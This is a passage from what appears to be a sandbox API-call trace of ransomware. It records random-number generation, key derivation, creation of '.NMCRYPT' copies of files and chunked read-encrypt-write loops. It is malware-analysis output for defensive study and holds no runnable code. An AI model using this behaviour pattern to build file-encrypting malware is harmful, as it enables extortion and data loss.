out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.106] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.106] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.106] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0163.106] CryptHashData (hHash=0x9ad378, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.107] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad578) returned 1 [0163.107] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.107] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.107] wcslen (_String="\\\\?\\") returned 0x4 [0163.107] CryptDuplicateKey (in: hKey=0x9ad578, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad5b8) returned 1 [0163.107] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.203] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=5524) returned 1 [0163.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.203] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.204] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.205] GetLastError () returned 0x0 [0163.205] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.206] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.206] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.206] GetLastError () returned 0x0 [0163.206] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.206] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.206] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.206] GetLastError () returned 0x0 [0163.206] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.206] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.206] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.206] GetLastError () returned 0x0 [0163.206] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.206] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.207] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.207] GetLastError () returned 0x0 [0163.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.207] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.207] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.207] GetLastError () returned 0x0 [0163.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: 